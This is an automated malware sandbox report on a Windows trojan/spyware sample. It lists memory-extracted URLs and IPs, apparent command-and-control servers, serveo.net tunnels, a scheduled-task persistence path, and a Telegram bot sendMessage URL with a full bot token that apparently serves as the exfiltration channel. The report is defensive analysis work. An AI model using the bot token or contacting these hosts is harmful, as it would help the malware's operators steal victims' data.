                                                      http://23.248.176.37:180vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ip-api.com/line?fields=queryvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://185.119.118.59:8080/hkLYW_user%40468325_report.wsrvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.ecosia.org/newtab/vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://185.119.118.59vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://127.0.0.1:vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://45.61.136.52:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://185.119.118.59:8080/hkLYW_uservkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://45.61.136.13:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • 2%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://154.26.128.6:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://212.6.44.53:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • 1%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://185.217.98.121:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • 15%, Virustotal, Browse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://api.telegram.orgvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessagevkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://44.228.161.50:443vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 2%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://104.248.208.221:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://164.90.185.9:443vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 9%, Virustotal, Browse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://www.w3.vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://18.228.80.130:80vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 11%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://contoso.com/powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://185.217.98.121:8080vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 11%, Virustotal, Browse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://193.142.58.127:80Pkvkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        low
                                                                                        https://e2111f95f52ba8be6b2d3394e38b1722.serveo.netvkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://e483612b93e055308d0c85f365c474ee.serveo.netvkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icovkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
URL: http://144.126.132.141:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://pesterbdd.com/i?
Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: malware
Reputation: unknown

URL: https://18.178.28.151:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://82.147.85.194/byte/
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: malware
Reputation: unknown

URL: http://upx.sf.net
Source: Amcache.hve.41.dr
Malicious: false
Reputation: high

URL: http://127.0.0.1:6787/ing=no
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://149.88.44.159:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://82.147.85.194
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: https://185.217.98.121:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: malware
Reputation: unknown

URL: https://ac.ecosia.org/autocomplete?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://116.202.101.219:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: malware
Reputation: unknown

URL: https://api.tele (string truncated in the dump)
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://206.189.109.146:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: malware
Reputation: unknown

URL: http://127.0.0.1:18772/handleOpenWSR?r=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: https://support.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Check: Avira URL Cloud: safe
Reputation: unknown

URL: http://crl.v (string truncated in the dump)
Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Check: URL Reputation: safe
Reputation: unknown

URL: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= (two URLs found as one string)
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
82.147.85.194 | unknown | Russian Federation | 31112 | SIBTEL-ASRU | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
138.68.79.95 | serveo.net | United States | 14061 | DIGITALOCEAN-ASNUS | false
185.119.118.59 | unknown | Austria | 44133 | IPAX-ASAT | false
                                                                                                    IP
                                                                                                    127.0.0.1
                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                    Analysis ID:1390172
                                                                                                    Start date and time:2024-02-10 16:16:06 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 11m 29s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:light
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:47
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:jqOHOuPMJP.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:7e9a93c69aecfc2bbda9470fbd4556db.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@66/19@3/6
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 87.5%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 98%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • TCP Packets have been reduced to 100
                                                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target vkefq4cv.oil.exe, PID 7316 because it is empty
                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
15:17:16 | Task Scheduler | Run new task: vkefq4cv.oil path: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
16:16:59 | API Interceptor | 2x Sleep call for process: jqOHOuPMJP.exe modified
16:16:59 | API Interceptor | 15x Sleep call for process: powershell.exe modified
16:17:17 | API Interceptor | 4964965x Sleep call for process: vkefq4cv.oil.exe modified
16:17:35 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3631329385084094
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fNJVulDnA0Z4V4LSaKUbJlVNe6lZF6zuiFtZ24lO8qU:1JViDbZ4V4LSaJbrWhzuiFtY4lO8qU
                                                                                                    MD5:8DF9BDA50BBE3450B40A752EFDA35970
                                                                                                    SHA1:9087F9B044B5643151B6E880FA1D4662544B872E
                                                                                                    SHA-256:B1554ABADA649C3F418FB4061ECDFA48ED84929AF06F3757DB7AA55203585DB6
                                                                                                    SHA-512:2D2622EE1C7D2AECDA109F88963444C341338281CD6C1384BDFC2ED2A704EBC74622A3EC5CA4416E0E1B830D0AAAC0F7988CED27D4B2A135D283E213354BF175
                                                                                                    Malicious:false
